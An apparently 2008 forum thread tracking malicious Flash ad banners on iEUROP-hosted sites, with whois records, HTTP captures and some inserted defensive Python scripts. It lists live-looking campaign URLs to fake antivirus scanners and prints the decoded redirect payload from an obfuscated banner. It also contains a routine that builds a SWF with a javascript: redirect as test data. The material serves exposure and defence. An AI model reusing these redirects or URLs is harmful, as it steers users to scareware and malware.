Websites.
  1. Ad2cash.net
  2. Ad2profit.com
  3. Adcomatoz.com
  4. Adgurman.com
  5. Adhokuspokus.com
  6. Adnetserver.com
  7. Adredired.com
  8. Adverdaemon.com
  9. Adverlounge.com
  10. Adzyclon.com
  11. Astalaprofit.com
  12. B2adz.com
  13. Bizadverts.com
  14. Bizmarketads.com
  15. Blessedads.com
  16. Brandmarketads.com
  17. Bucksbill.com
  18. Deuspayment.com
  19. Friedads.com
  20. Glorymarkets.com
  21. Iddqdmarketing.com
  22. Intervarioclick.com
  23. Invulnerableads.com
  24. Luckyadcoin.com
  25. Luckyadsols.com
  26. Moneycometrue.com
  27. Mythmarketing.com
  28. Popadprovider.com
  29. Prevedmarketing.com
  30. Rocktheads.com
  31. Sharpadverts.com
  32. Shivanetworking.com
  33. Waytotheprofit.com
Kimberly
<h4>
www.taringa.net - Car.com banner
</h4>
With the help of a victim of these redirects, I was able to catch the malicious "car.com" banner being displayed at www.taringa.net, a social networking site in Argentina.

Screenshot in situ.
IPB Image
Banner.
g.impresionesweb.com/b/1/6/d/17113.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.

At the time of the write up I didn't get a complete redirect but we all know where we end up ... a fake online scanner.
getfreecar.com/statsa.php?u=1200066806&campaign=weidoneous
______________________________

It's not the first time that Impresiones Web has been caught displaying malvertizements; another malicious banner for an adult site was reported on 7th April 2008.


Note: Special thanks to the victim of this redirect for providing me the necessary information.
Kimberly
<h4>
ifrance / isuisse - malicious banners
</h4>
There is the good news and the bad news ... From time to time I have been checking back on the websites hosted on ifrance and isuisse that are victims of the redirects caused by 2 different malicious banners.

The good news ... the Curves banner displayed on pharmacies-gms.ifrance.com, paysagevirtuel.ifrance.com, hb9mdl.isuisse.com "seems" to have vanished. I don't have an official confirmation about the banner being put out of circulation as ifrance / iEUROP never gave any sign of life. The direct link to the malvertizement is still live.

The bad news ... the First Choice banner is still being displayed at frankyturf.ifrance.com and worst of all, it's now showing up on pharmacies-gms.ifrance.com too.

Adopstools

http://www.adopstools.com/index.asp?page=q...rf54ypoYU5QR77i

Screenshots in situ.
IPB Image
IPB Image
Extreme caution thus remains in order and I maintain my advice to block image.ifrance.com in your firewall, router, adblock software, hosts file ... etc.
Kimberly
<h4>
ifrance - First Choice
</h4>
The First Choice banner is still being displayed at frankyturf.ifrance.com

Network activity.
IPB Image
<h4>
click.adlbrite.com - 217.150.254.46
</h4>
I noticed I never covered the whois details of click.adlbrite.com, present in the First Choice malvertizement.

click.adlbrite.com - 217.150.254.46

Website Title: None given.
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2007-11-26
Expires: 2008-11-26
Updated: 2008-01-28
Registrar Status: clientTransferProhibited
Name Server: NS1.ADLBRITE.COM (has 1 domains)
Name Server: NS2.ADLBRITE.COM
Whois Server: whois.srsplus.com

IP Address: 217.150.254.46
IP Location - Switzerland - Pc Ions Incorporation

Registrant:
Sara Sen (mail@adlbrite.com)
Hight str 45
Baltim, NONE 8232
CL
152656555

Administrative, Technical, Billing Contact:
Sara Sen (mail@adlbrite.com)
Hight str 45
Baltim, NONE 8232
CL
152656555

Domain servers:
ns1.adlbrite.com - 202.75.35.72 - AS17464 TMIDC AP Hosting Services (MYLOCA), Data Services Division, Telekom Malaysia
ns2.adlbrite.com - 58.65.238.170 - AS27595 ATRIVO AS Atrivo

Domain Service Provider:
SoftSolutions Inc

Domains sharing nameservers.
  • aboutstat.com
  • akamahi.net
  • entrerrenglonadura.com
  • googiesindication.com
  • newstat.net
  • officialstat.com
  • quinquecahue.com
  • stat-diagnostic-imaging.com
  • stat-diagnostic-imaging.net
  • statetstr.com
  • statgroup.net
  • stathisranch.net
  • stathome.net
  • staticglobalsources.com
  • staticglobalsources.net
  • station-appraisals.com
  • station-appraisals.net
  • statnation.net
  • statsla.net
  • statworld.net
  • thetechnorati.com
  • vozemiliogaranon.com
These are well known domains. - Ref.
Kimberly
<h4>
ifrance.com - a-j.ifrance.com
</h4>
Another malvertizement present on ifrance. This is now the third malicious banner discovered since June the 12th. The creative advertises XM Radio and is hosted on admin.hostadserve.com which is linked to several other bad advertising companies and Mr "Serg Moon".

Site.

a-j.ifrance.com

Screenshot in situ.
IPB Image
Banner.
admin.hostadserve.com/www/images/xm_radio_728_90-8.swf
IPB Image
IPB Image
IPB Image
IPB Image
Campaign.
stathisranch.net/c/index.php?id=m7NkiZU5zQ1hCWVNGanVKN055Q01zaXFoPTEyMTQ0ODA4NjYmcG56Y252dGE9bmm7NkiZvbmVlbmdim7NkiZQYNkiDgNmYNkiDgNm

profitabill.com/?cmpid=asbarrator
<h4>
admin.hostadserve.com - 83.96.185.57
</h4>
We stumble on some interesting information here ... and guess who shows up in the whois details?
moon.serg@gmail.com - sounds familiar, doesn't it? - Ref.
IPB Image
Domain Name: HOSTADSERVE.COM
Registrar: TLDS, LLC DBA SRSPLUS
Whois Server: whois.srsplus.com
Referral URL: http://www.srsplus.com
Name Server: NS1.HOSTADSERVE.COM
Name Server: NS2.HOSTADSERVE.COM
Status: clientTransferProhibited
Updated Date: 05-jun-2008
Creation Date: 27-may-2008
Expiration Date: 27-may-2009

Queried whois.srsplus.com with "hostadserve.com"...

hostadserve.com

Registrant:
Alex Ferguson (moon.serg@gmail.com)
Rodeo drive 12
Baltimor, NONE 20040
AL
380913064412

Administrative, Technical, Billing Contact:
Alex Ferguson (moon.serg@gmail.com)
Rodeo drive 12
Baltimor, NONE 20040
AL
380913064412

Record created on May 27 2008.
Record expires on May 27 2009.

Domain servers:
ns1.hostadserve.com
ns2.hostadserve.com

Domain Service Provider:
Sagent Group

______________________________

When we visit admin.hostadserve.com, we are redirected to admin.r2d2adverising.com ... r2d2adverising.com is a well known bad advertising company.

CODE
GET / HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Wed, 02 Jul 2008 17:52:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.2.5
Location: http://admin.r2d2adverising.com/www/admin/index.php
IPB Image
______________________________

hostadserve.com - 76.74.249.30

hostadserve.com serves a 404 error and resolves to luckyadsols.com, another bad advertising company. hostadserve.com has also been registered by Alex Ferguson - aka Mr Moon - moon.serg@gmail.com

Website Title: 404 - Not Found
ICANN Registrar: TLDS, LLC DBA SRSPLUS
Created: 2008-05-27
Expires: 2009-05-27
Updated: 2008-06-05
Name Server: NS1.HOSTADSERVE.COM (has 2 domains)
Name Server: NS2.HOSTADSERVE.COM
Whois Server: whois.srsplus.com

IP Address: 76.74.249.30
IP Location - Bvi - Tortola - Soft.sol.inc

Here we go again ...
"Alex Ferguson" owns about 32 other domains.
moon.serg@gmail.com is associated with about 103 domains.
Websites.
  1. Ad2cash.net
  2. Ad2profit.com
  3. Adcomatoz.com
  4. Adgurman.com
  5. Adhokuspokus.com
  6. Adnetserver.com
  7. Adredired.com
  8. Adverdaemon.com
  9. Adverlounge.com
  10. Adzyclon.com
  11. Astalaprofit.com
  12. B2adz.com
  13. Bizadverts.com
  14. Bizmarketads.com
  15. Blessedads.com
  16. Brandmarketads.com
  17. Bucksbill.com
  18. Deuspayment.com
  19. Friedads.com
  20. Glorymarkets.com
  21. Iddqdmarketing.com
  22. Intervarioclick.com
  23. Invulnerableads.com
  24. Luckyadcoin.com
  25. Luckyadsols.com
  26. Moneycometrue.com
  27. Mythmarketing.com
  28. Popadprovider.com
  29. Prevedmarketing.com
  30. Rocktheads.com
  31. Sharpadverts.com
  32. Shivanetworking.com
  33. Waytotheprofit.com
If you have been approached by people representing admin.hostadserve.com, hostadserve.com or any related domain, check your creatives please.
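The pivots used throughout these posts (same IP, neighbouring IP in the same /24, shared nameservers, the same registrant e-mail) can be applied mechanically once the whois data is in hand. The following is an added example, not tooling from the thread: it links domains through those shared values with a union-find and deliberately drops pivots that are shared by thousands of unrelated domains (privacy-proxy contacts, bulk managed nameservers such as NS1.US.EDITDNS.NET, which the thread notes carries 9,561 domains), because linking on those only produces one useless blob. The sample records are assembled from the whois excerpts quoted in this thread; fields the thread does not give are left empty, and the `NOISY_PIVOTS` set is my own choice.

```python
"""Cluster malvertising domains by shared infrastructure.

Added example, not tooling from the thread.  Domains that share an IP, a
/24, a nameserver or a registrant e-mail are joined with a union-find;
pivots known to be shared by thousands of unrelated domains are ignored
by default.  Sample records come from whois excerpts quoted in the
thread; fields the thread does not give are left empty.
"""
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_network
from typing import Optional


@dataclass(frozen=True)
class DomainRecord:
    domain: str
    ips: tuple = ()
    nameservers: tuple = ()
    registrant_email: Optional[str] = None


# Pivot values that connect thousands of unrelated domains (privacy-proxy
# contact, bulk managed nameservers).  Linking on them is noise.
NOISY_PIVOTS = {
    "email:contact@privacyprotect.org",
    "ns:ns1.us.editdns.net",
    "ns:managedns1.estboxes.com",
}


def pivot_keys(rec: DomainRecord, ignore_noisy: bool = True) -> set:
    """All pivot values a record carries, tagged by type (IPv4 assumed)."""
    keys = set()
    for ip in rec.ips:
        keys.add(f"ip:{ip}")
        # Same /24 = "neighbours" in the thread's sense.  A weak link on
        # shared hosting, so it is reported as evidence rather than hidden.
        keys.add(f"net24:{ip_network(f'{ip}/24', strict=False)}")
    for ns in rec.nameservers:
        keys.add(f"ns:{ns.lower()}")
    if rec.registrant_email:
        keys.add(f"email:{rec.registrant_email.lower()}")
    return keys - NOISY_PIVOTS if ignore_noisy else keys


def cluster_by_infrastructure(records, ignore_noisy: bool = True):
    """Return [(sorted domains, sorted pivot keys that hold the cluster together)]."""
    parent = {r.domain: r.domain for r in records}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    carriers = defaultdict(list)  # pivot key -> domains that carry it
    for r in records:
        for key in pivot_keys(r, ignore_noisy):
            carriers[key].append(r.domain)
    for key, doms in carriers.items():
        for d in doms[1:]:
            parent[find(d)] = find(doms[0])

    members = defaultdict(list)
    for r in records:
        members[find(r.domain)].append(r.domain)
    evidence = defaultdict(set)
    for key, doms in carriers.items():
        if len(doms) > 1:
            evidence[find(doms[0])].add(key)
    return sorted((sorted(doms), sorted(evidence[root])) for root, doms in members.items())


# Values copied from the whois excerpts in this thread.
SAMPLE_RECORDS = [
    DomainRecord("trueffect-cdn.com", ("67.205.93.101",), ("ns1.trueffect-cdn.com",), "contact@privacyprotect.org"),
    DomainRecord("atlas-ads.com", ("67.205.93.102",)),
    DomainRecord("spywaredestructor.com", ("67.205.75.9",), ("ns1.us.editdns.net",), "contact@privacyprotect.org"),
    DomainRecord("openadstream.net", ("67.210.12.62",), ("managedns1.estboxes.com",), "contact@privacyprotect.org"),
    DomainRecord("adverdaemon.com", ("76.74.249.30",), ("ns1.adverdaemon.com",), "adverdaemon@yahoo.com"),
    DomainRecord("hostadserve.com", ("76.74.249.30",), ("ns1.hostadserve.com",), "moon.serg@gmail.com"),
    DomainRecord("click.adlbrite.com", ("217.150.254.46",), ("ns1.adlbrite.com",), "mail@adlbrite.com"),
    DomainRecord("stathisranch.net", (), ("ns1.adlbrite.com",)),
]

if __name__ == "__main__":
    for domains, why in cluster_by_infrastructure(SAMPLE_RECORDS):
        print(", ".join(domains), "<-", ", ".join(why) or "no shared pivot")
```

With the noise filter on, the output reproduces the links drawn by hand in the posts: adverdaemon.com and hostadserve.com on 76.74.249.30, trueffect-cdn.com and atlas-ads.com as /24 neighbours, click.adlbrite.com and stathisranch.net on the adlbrite nameservers. Run it with `ignore_noisy=False` and the shared PrivacyProtect.org contact merges trueffect-cdn.com, spywaredestructor.com and openadstream.net into one cluster, which says nothing about who operates them, only that they all used the same proxy service.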
Kimberly
<h4>
Alert ...
</h4>
From: Alert: recurring malvertizements at ifrance.com (and isuisse.com)

Heck, let's also pay close attention to ibelgique.com, iespana.es, iitalia.com and iquebec.com, all of which are closely related to ifrance.com and isuisse.com (also subject to guilt by association).
As expected ... pay attention to ANYTHING related.

joedzina.iquebec.com
IPB Image
IPB Image

nyssa.model.ibelgique.com
IPB Image
IPB Image
ifrance has a directory listing and I picked out sites in the "Charme" section this time, followed by the "Arts Culture" listing. Both banners are also present on:
  1. escortanne.ifrance.com
  2. escorte13000.ifrance.com
  3. telechargervraieblonde.ifrance.com
  4. sexyblack.ifrance.com
  5. etc ... ???
The XM Radio malvertizement:
  1. necs2.isuisse.com
  2. sky-musique.ifrance.com
  3. wagnorocx.iquebec.com
  4. jeunesse-de-thieulain.ibelgique.com
  5. etc ... ???
Note: the etc ... ??? is just to "show" that you can pick out about any site and encounter those malverts.
Kimberly
<h4>
iEUROP Group : ifrance - isuisse - ibelgique.com - iquebec.com - iespana.es - iitalia.com
</h4>
Just a demonstration to show how exposed you can be to the malicious banners on the iEUROP group. Pick up a site from the Directory listing and clean your Internet Temporary Files before visiting a website. Date & Time stamp of the visit are visible in the network trace. I have also replaced http with hxxp in order to kill live links.

paysagevirtuel.ifrance.com
GET /www/images/xm_radio_728_90-8.swf HTTP/1.1
Accept: */*
Referer: hxxp://paysagevirtuel.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Jul 2008 15:05:37 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40:21 GMT
Accept-Ranges: bytes
pharmacies-gms.ifrance.com
GET /img/pub/proximogroup/firstchoiceFR_468x60.swf?clickTARGETclickTARGET=_blank&clickTAG=[removed] HTTP/1.1
Accept: */*
Referer: hxxp://pharmacies-gms.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image.ifrance.com
Connection: Keep-Alive
Cookie: BlueLithium=no

HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Accept-Ranges: bytes
ETag: "1078225941"
Last-Modified: Wed, 12 Mar 2008 16:58:55 GMT
Content-Length: 25040
Date: Thu, 03 Jul 2008 15:17:58 GMT
Server: lighttpd/1.4.18
GET /www/images/xm_radio_728_90-8.swf HTTP/1.1
Accept: */*
Referer: hxxp://pharmacies-gms.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Jul 2008 15:20:42 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40
Accept-Ranges: bytes
frankyturf.ifrance.com
GET /www/images/xm_radio_728_90-8.swf HTTP/1.1
Accept: */*
Referer: hxxp://frankyturf.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Jul 2008 15:31:04 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40:21 GMT
Accept-Ranges: bytes
GET /img/pub/proximogroup/firstchoiceFR_468x60.swf?clickTARGET=[removed] HTTP/1.1
Accept: */*
Referer: hxxp://frankyturf.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: image.ifrance.com
Connection: Keep-Alive
Cookie: BlueLithium=no

HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Accept-Ranges: bytes
ETag: "1078225941"
Last-Modified: Wed, 12 Mar 2008 16:58:55 GMT
Content-Length: 25040
Date: Thu, 03 Jul 2008 15:33:45 GMT
Server: lighttpd/1.4.18
pc-universe.ifrance.com
GET /www/images/xm_radio_728_90-8.swf HTTP/1.1
Accept: */*
Referer: hxxp://pc-universe.ifrance.com/
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Jul 2008 15:39:00 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40:21 GMT
Accept-Ranges: bytes
ipodmediapro.ifrance.com
GET /www/images/xm_radio_728_90-8.swf HTTP/1.1
Accept: */*
Referer: hxxp://ipodmediapro.ifrance.com
x-flash-version: 9,0,47,0
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: admin.hostadserve.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Jul 2008 15:42:02 GMT
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40
Accept-Ranges: bytes
I maintain my advice to block ALL advertising content from iEUROP & Co. until we have confirmation that:
  • Steps have been taken to wipe out the malvertizements.
  • Steps have been taken to prevent this from happening again.
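An added example, not posted by Kimberly or anyone in this thread: a small Python script that turns a capture in the shape shown above into an inventory of Flash creatives. The capture shows the same XM Radio file (Content-Length 19484, Last-Modified 26 Jun 2008) fetched from admin.hostadserve.com by several ifrance.com subdomains, and grouping responses by (Content-Length, Last-Modified) is what makes that pattern visible at a glance. The embedded capture excerpt is constructed in the same layout as the one above; its hosts and paths are placeholders.

```python
import re
from collections import defaultdict

# Constructed excerpt in the same layout as the capture above; hosts and
# paths are placeholders, not the real ones from the thread.
SAMPLE_CAPTURE = """\
GET /ads/banner_728_90.swf HTTP/1.1
Accept: */*
Referer: hxxp://site-a.example.invalid/
x-flash-version: 9,0,47,0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: ads.example.invalid
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Connection: close
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40:21 GMT
Accept-Ranges: bytes
GET /ads/banner_728_90.swf HTTP/1.1
Accept: */*
Referer: hxxp://site-b.example.invalid/
Host: ads.example.invalid
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx
Content-Type: application/x-shockwave-flash
Content-Length: 19484
Last-Modified: Thu, 26 Jun 2008 07:40:21 GMT
GET /img/other_468x60.swf?clickTAG=x HTTP/1.1
Referer: hxxp://site-b.example.invalid/
Host: image.example.invalid

HTTP/1.1 200 OK
Content-Type: application/x-shockwave-flash
Content-Length: 25040
Last-Modified: Wed, 12 Mar 2008 16:58:55 GMT
"""

REQ_RE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]$")
RESP_RE = re.compile(r"^HTTP/1\.[01] (\d{3})")


def parse_capture(text):
    """Pair each request line with the response that follows it.

    Returns a list of dicts: method, path, status, and lower-cased header
    maps for the request ('req') and the response ('resp')."""
    exchanges, current, section = [], None, None
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if m:
            current = {"method": m.group(1), "path": m.group(2),
                       "status": None, "req": {}, "resp": {}}
            exchanges.append(current)
            section = "req"
            continue
        m = RESP_RE.match(line)
        if m and current is not None:
            current["status"] = int(m.group(1))
            section = "resp"
            continue
        if current is not None and section and ":" in line:
            key, value = line.split(":", 1)
            current[section][key.strip().lower()] = value.strip()
    return exchanges


def swf_inventory(text):
    """Group Flash responses by (Content-Length, Last-Modified).

    One creative served to many referring sites shows up as a single key
    with several referers, which is the pattern in the capture above."""
    groups = defaultdict(lambda: {"hosts": set(), "referers": set(), "paths": set()})
    for ex in parse_capture(text):
        if ex["resp"].get("content-type") != "application/x-shockwave-flash":
            continue
        key = (ex["resp"].get("content-length"), ex["resp"].get("last-modified"))
        groups[key]["hosts"].add(ex["req"].get("host", "?"))
        groups[key]["referers"].add(ex["req"].get("referer", "?"))
        groups[key]["paths"].add(ex["path"].split("?")[0])
    return dict(groups)


if __name__ == "__main__":
    for key, group in swf_inventory(SAMPLE_CAPTURE).items():
        print(key, sorted(group["hosts"]), sorted(group["referers"]))
```

Feed it a real capture (as text, one request/response pair after the other) and any key with many referers but one host and one path is the creative to pull and inspect first.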
Kimberly
<h4>
Special Flash: XM Radio invasion takes over iQuébec’s homepage !!!
</h4>
Instead of regressing, the situation at websites owned by iEUROP actually gets worse. This time I got p0wn3d by XM Radio on iQuébec’s homepage.
[screenshot]
Looks like XM Radio got itself a nice part of iEUROP as a ID4 gift. wink.gif
[screenshot]
Visitors & owners, stand up and shout !!!
Kimberly
<h4>
A different way to exploit redirects in Flash content
</h4>
A couple of days ago I did mention a shockwave exploit covered by Kaspersky. The technique used below is another example of obfuscated code in Flash files redirecting the victims to fake online scanners.

The homepage contains the usual code to display a Flash banner.
[screenshot]
Upon entering the website, the visitor is redirected to a fake online scanner unfortunately.
www.antivirusxp2008.com/sysscan/f8328c13dbee8a7d935617b6b38b0e80/1/
The porn.swf file is very small, only 247 bytes. It simply contains 1 frame and 1 script, no images. The actionscript uses the javascript function getURL("javascript: x");
[screenshots]
The URL is encrypted / obfuscated as seen below.
[screenshot]
Once decoded, the link becomes visible.
window.location = "//www.antivirusxp2008.com/sysscan/f8328c13dbee8a7d935617b6b38b0e80/1/";
Yet another reason to block Flash content ...

Note: Special thanks to crunchtime for the initial link to the swf
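An added example, not code from the thread or from whoever built the banner: a Python scanner for the kind of file described above (one frame, one script, no images, a getURL to a javascript: URL). It walks the SWF tags, pulls the strings out of every AS2 DoAction script (getURL arguments and pushed string constants), percent-decodes them and flags javascript: targets. To have something to run it on, it also constructs a one-frame SWF of the same shape; the URL and host in it are placeholders (example.invalid), not the real ones, and the decoding step only covers percent-encoding, whereas the real banner's obfuscation had to be unpicked by hand. AS3 (DoABC) scripts are out of scope for this scanner.

```python
import struct
import zlib
from urllib.parse import unquote

# SWF tag codes and AS2 action opcodes used below (values from the SWF file format spec).
TAG_END, TAG_SHOW_FRAME, TAG_DO_ACTION, TAG_DO_INIT_ACTION = 0, 1, 12, 59
ACTION_GET_URL, ACTION_PUSH = 0x83, 0x96
_PUSH_SIZES = {1: 4, 2: 0, 3: 0, 4: 1, 5: 1, 6: 8, 7: 4, 8: 1, 9: 2}  # non-string push types

# Constructed placeholder: a percent-encoded javascript: URL, not the real one.
SAMPLE_URL = "javascript:window.location=%22%2F%2Fscanner.example.invalid%2Fsysscan%2F%22"


def _rect_bytes(nbits=15, values=(0, 11000, 0, 1200)):
    """Encode a SWF RECT: a 5-bit Nbits field then four Nbits-wide twip values."""
    bits = format(nbits, "05b") + "".join(format(v, f"0{nbits}b") for v in values)
    bits += "0" * (-len(bits) % 8)
    return int(bits, 2).to_bytes(len(bits) // 8, "big")


def _tag(code, body):
    """RECORDHEADER: u16 = code << 6 | length; lengths >= 0x3F use the long form."""
    if len(body) < 0x3F:
        return struct.pack("<H", (code << 6) | len(body)) + body
    return struct.pack("<HI", (code << 6) | 0x3F, len(body)) + body


def build_sample_swf(url, target="_self", compress=False):
    """Construct a one-frame SWF whose only script is getURL(url, target).
    Hypothetical test data with the shape of the banner above, not the banner itself."""
    get_url = (bytes([ACTION_GET_URL]) + struct.pack("<H", len(url) + len(target) + 2)
               + url.encode() + b"\0" + target.encode() + b"\0")
    actions = get_url + b"\0"                              # ActionEnd closes the script
    body = _rect_bytes() + struct.pack("<HH", 12 << 8, 1)  # 12.0 fps (8.8 fixed), 1 frame
    body += _tag(TAG_DO_ACTION, actions) + _tag(TAG_SHOW_FRAME, b"") + _tag(TAG_END, b"")
    length = 8 + len(body)                                 # FileLength = uncompressed size
    payload = zlib.compress(body) if compress else body
    return (b"CWS" if compress else b"FWS") + bytes([8]) + struct.pack("<I", length) + payload


def _iter_tags(data):
    """Yield (code, body) for each tag of an uncompressed SWF body (header stripped)."""
    nbits = data[0] >> 3
    pos = (5 + 4 * nbits + 7) // 8 + 4  # skip RECT, frame rate and frame count
    while pos + 2 <= len(data):
        hdr, = struct.unpack_from("<H", data, pos)
        pos += 2
        code, length = hdr >> 6, hdr & 0x3F
        if length == 0x3F:
            length, = struct.unpack_from("<I", data, pos)
            pos += 4
        yield code, data[pos:pos + length]
        pos += length
        if code == TAG_END:
            break


def _iter_actions(body):
    """Yield (opcode, payload) ACTIONRECORDs; opcodes >= 0x80 carry a u16 length."""
    pos = 0
    while pos < len(body):
        op = body[pos]
        pos += 1
        if op == 0:
            break
        if op >= 0x80:
            length, = struct.unpack_from("<H", body, pos)
            pos += 2
            yield op, body[pos:pos + length]
            pos += length
        else:
            yield op, b""


def _push_strings(payload):
    """String constants (type 0) from an ActionPush payload; other types are skipped."""
    pos, out = 0, []
    while pos < len(payload):
        t = payload[pos]
        pos += 1
        if t == 0:
            end = payload.index(b"\0", pos)
            out.append(payload[pos:end].decode("latin-1"))
            pos = end + 1
        elif t in _PUSH_SIZES:
            pos += _PUSH_SIZES[t]
        else:
            break
    return out


def scan_swf(data):
    """List every URL-like string reachable from a DoAction/DoInitAction script,
    with its percent-decoded form and a flag for javascript: targets."""
    if data[:3] == b"CWS":
        data = zlib.decompress(data[8:])
    elif data[:3] == b"FWS":
        data = data[8:]
    else:
        raise ValueError("not a SWF file")
    findings = []
    for code, body in _iter_tags(data):
        if code not in (TAG_DO_ACTION, TAG_DO_INIT_ACTION):
            continue
        for op, payload in _iter_actions(body):
            if op == ACTION_GET_URL:
                strings = [payload.split(b"\0")[0].decode("latin-1")]
            elif op == ACTION_PUSH:
                strings = _push_strings(payload)
            else:
                continue
            for s in strings:
                decoded = unquote(s)
                findings.append({"action": "getURL" if op == ACTION_GET_URL else "push",
                                 "raw": s, "decoded": decoded,
                                 "javascript": decoded.strip().lower().startswith("javascript:")})
    return findings


if __name__ == "__main__":
    for finding in scan_swf(build_sample_swf(SAMPLE_URL)):
        print(finding)
```

Run it against a banner pulled from an ad server (scan_swf(open(path, "rb").read())); a creative whose only script is a getURL to a javascript: URL, as here, is the signature the thread is describing, while a legitimate clickTAG banner pushes a plain http URL or reads it from the clickTAG variable.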
Kimberly
<h4>
isuisse.com / ibelgique.com / iquebec.com - Forex AutoPilot
</h4>
A yet unseen, new malvertizement is present on the homepage of isuisse.com, ibelgique.com & iquebec.com. The banner advertises Forex AutoPilot and the creative belongs to the new generation created with Fuse Kit 2.1.4. This is now the FOURTH malicious banner discovered since June the 12th on websites belonging to the group iEUROP. Just on a side note, the XM Radio malvertizement is also being displayed at isuisse on the portal page. This brings the count up to THREE active malvertizements being served to the visitors!!! Imagine the number of users being redirected to fake online scanners ... Enough is enough, this has to stop.

Screenshots in situ.
[screenshots]
Banner.
image.ifrance.com/img/pub/servedad/forexautopilot_728x90.swf
[screenshots]
Campaign.
adoptserver.info/_statis.gif?url=[removed]

windowsxp-privacy.net/?id=198760063
xponlinescanner.com/soft.php?aid=024202&d=3&product=XPA
xponlinescanner9.com/2009/1/freescan.php?aid=77024202
<h4>
xponlinescanner9.com - 72.233.81.106
</h4>

Website Title: Antivirus 2009 - Official website
ICANN Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM
Created: 2008-07-01
Expires: 2009-07-01
Updated: 2008-07-01

Name Server: NS1.MYNICK.NAME (has 1,262 domains)
Name Server: NS2.MYNICK.NAME
Name Server: NS3.MYNICK.NAME
Name Server: NS4.MYNICK.NAME
Whois Server: whois.publicdomainregistry.com

IP Location - Texas - Plano - Layered Technologies Inc

Whois Record
Domain Name: XPONLINESCANNER9.COM

Creation Date: 01-Jul-2008
Expiration Date: 01-Jul-2009

Domain servers in listed order:
ns4.mynick.name
ns3.mynick.name
ns2.mynick.name
ns1.mynick.name

Registrant:
PrivacyProtect.org

Websites.
  1. antivirus-2009.com
  2. antivirus-database.com
  3. antivirus2009professional.com
  4. prettygreatsex.info
  5. xpantivirusonline.com
  6. xponlinescanner.com
  7. xponlinescanner9.com
Kimberly
<h4>
Cooking.com - Still circulating
</h4>
Banner.
a836.g.akamai.net/m/800/1128/1206982808/network.realmedia.com/RealMedia/ads/Creatives/OasDefault/BCN2008030226_01_Cooking/Cooking_728x90_a.swf
[screenshots]
Campaign.
stat-diagnostic-imaging.net/c/index.php?id=SHhGdWdQQXBHeWNhV0lJckdzcHpoPTEyMDY5ODA1NDImcG56Y252dGE9cHVyaXJ5aGVyMQYNkiDgNmYNkiDgNm

waytotheprofit.com/?cmpid=chevelure1&adid=intl
Reported on teamsugar on June 29 th.
Kimberly
<h4>
iEUROP Group : ifrance - isuisse - ibelgique.com - iquebec.com - iespana.es - iitalia.com
</h4>
As stated several times, we don't have any communication with iEUROP, thus I'm forced to check the websites regularly to see if any cleanup has been performed. Today ifrance, isuisse, ibelgique & iquebec seem to have part of the advertising disabled. The page header with the site logo and advertising space is missing, as seen below.
[screenshot]
